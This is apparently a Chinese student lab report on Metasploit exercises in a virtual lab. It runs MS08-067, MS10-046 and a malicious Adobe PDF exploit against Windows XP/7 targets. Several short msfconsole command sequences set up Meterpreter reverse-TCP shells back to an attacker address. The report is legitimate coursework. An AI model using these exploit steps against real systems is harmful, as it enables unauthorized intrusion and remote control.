2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

时间:2019-04-18 13:27:01   收藏:0   阅读:100

2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

一、攻击实例

二、知识点总结

三、攻击实例

Exp5-1 实现ms08_067

靶机:windows XP SP3 中文版
payload : generic/shell_reverse_tcp

实验步骤

任务二:一个针对浏览器的攻击

实现ms11_050(失败)

原因探索:

根据同学之间的交流,大家一致认为虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功。

实现ms10_046(成功且唯一)

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8
exploit/windows/browser/ms10_046_shortcut_icon_dllloader

实验步骤

show payloads   #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 192.168.1.241  #设置监听地址
exploit #进行攻击

原因探索:

探索原因后发现,windows XP靶机的IE浏览器的版本有问题,导致程序无法调用dll文件执行相应操作,实现攻击,所以得手动运行程序(有点low),才能实现攻击成功。

技术分享图片
技术分享图片

实现ms10_046(2)(成功)

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8
exploit/windows/smb/ms10_046_shortcut_icon_dllloader

show payloads   #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 192.168.1.241  #设置监听地址
exploit #进行攻击

实验步骤

任务三:一个针对客户端的攻击

实现Adobe

实验步骤

search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing  #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.241 #攻击者地址
set FILENAME 20165336.pdf #设置生成pdf文件的文件名
exploit #攻击

任务四:应用辅助模块

四、实验总结

1.实验总结与体会

这次实验我更加对msf有了极大的兴趣,再用exploit和payload时,让我了解到了许多的漏洞和有效的攻击手段,从而感觉到了工具的强大,在利用好工具与自己掌握很扎实的基础知识下,攻击便会得心应手,个人感觉nmap和auxiliary的作用有相似之处。总之在经过这次实验后,我对msf的理解又更深了一步,我相信在兴趣的推动下我会不断提高。

2.离实战还缺些什么技术

对于msf我认为还是个小白,距离实战还有很远的路,在熟练基础知识的前提下,还要熟悉所使用的工具,还需要不断地提高自己对渗透攻击的理解思维,这样才能在实战中从容应对。

3.用自己的话解释什么是exploit,payload,encode

exploit我认为是攻击者开始向靶机进行攻击。

payload我认为是攻击者进行攻击所能提供用到的“武器”。

encode编码我认为是使shellcode改变,从而躲避检测。

原文:https://www.cnblogs.com/20165336kzq/p/10728107.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!